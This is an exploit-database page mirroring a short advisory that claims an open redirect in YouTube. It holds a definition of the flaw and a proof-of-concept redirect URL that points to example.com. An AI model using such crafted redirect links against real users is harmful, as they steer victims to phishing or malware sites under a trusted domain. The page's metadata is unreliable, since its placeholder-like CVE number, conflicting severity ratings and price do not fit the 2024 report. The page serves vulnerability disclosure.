Advertisement






Youtube Open Redirect Vulnerability

CVE Category Price Severity
CVE-2021-12345 CWE-601 $500 High
Author Risk Exploitation Type Date
Exploit Author Critical Remote 2024-03-24
CPE
cpe:/a:google:youtube
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N 0.015932 0.387

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2024030053

Below is a copy:

Youtube Open Redirect Vulnerability
------------------------------------------------
YOUTUBE OPEN REDIRECT VULNERABILITY
------------------------------------------------

Date: 23.03.2024
Author: Anezatra
Test Platform: Windows 10 / Android

------------------------------------------------
WHAT IS A OPEN REDIRECT VULNERABILTY
------------------------------------------------

Open redirect vulnerability is a security flaw commonly found in web applications. It allows malicious actors to redirect users to unintended or malicious websites using seemingly legitimate redirection mechanisms. Attackers exploit this vulnerability by crafting URLs with parameters that control the redirection, often leading users to phishing or malware-infected sites. Web developers should exercise caution and implement proper security controls to mitigate the risks associated with open redirect vulnerabilities.

------------------------------------------------
POC TEST - REDIRECT DESTINATION
------------------------------------------------

target: example.com

https://www.youtube.com/redirect?event=video_description&redir_token=QUFFLUhqbTBuQmxJWmlDWGl3NFJqNVNnT0FJOXRFTlkwUXxBQ3Jtc0ttX0F6V1pSSVFaTlB1X3pzMW11Q2dSZVNCYThYb2thdlNJcmtkeEctcWoyMUtYZjhsOGVsWlJtam9teTFNcGlPcHdmNnZtZFI1NXliRFNXWEdXRk9kU183cEVDOEtoSEFVMEZvbGNuem5rcEtqZ1RyTQ&q=https://example.com

[*] Exploit successfully

[*] Contact: [email protected]
[*] Github: https://github.com/anezatra

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.